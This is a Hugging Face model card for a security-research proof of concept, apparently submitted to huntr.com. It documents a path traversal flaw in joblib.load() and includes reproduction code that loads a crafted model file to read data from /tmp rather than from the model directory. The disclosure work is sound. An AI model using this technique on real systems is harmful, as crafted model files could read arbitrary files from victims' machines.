Instructions to use bassia/joblib-path-traversal-poc with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- Scikit-learn
How to use bassia/joblib-path-traversal-poc with Scikit-learn:
from huggingface_hub import hf_hub_download import joblib model = joblib.load( hf_hub_download("bassia/joblib-path-traversal-poc", "sklearn_model.joblib") ) # only load pickle files from sources you trust # read more about it here https://skops.readthedocs.io/en/stable/persistence.html - Notebooks
- Google Colab
- Kaggle
Security Research β Joblib Path Traversal PoC
This model is for authorized security research only (huntr.com MFV submission).
This demonstrates CVE: Path Traversal via NDArrayWrapper in joblib.load().
Vulnerability
joblib/numpy_pickle_compat.py:99 β os.path.join(dirname, self.filename) discards
the base directory when self.filename is an absolute path, allowing arbitrary file reads.
Reproduction
# Step 1: Create a test file at the traversal target
import numpy as np
np.save('/tmp/huntr_poc_data.npy', np.array([1.0, 2.0, 3.0]))
# Step 2: Download and load the model
from huggingface_hub import hf_hub_download
import joblib
path = hf_hub_download(repo_id="bassia/joblib-path-traversal-poc", filename="model.joblib")
result = joblib.load(path)
print("Data read via path traversal:", result)
# Output: [1. 2. 3.] β read from /tmp/, NOT from the model directory!
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support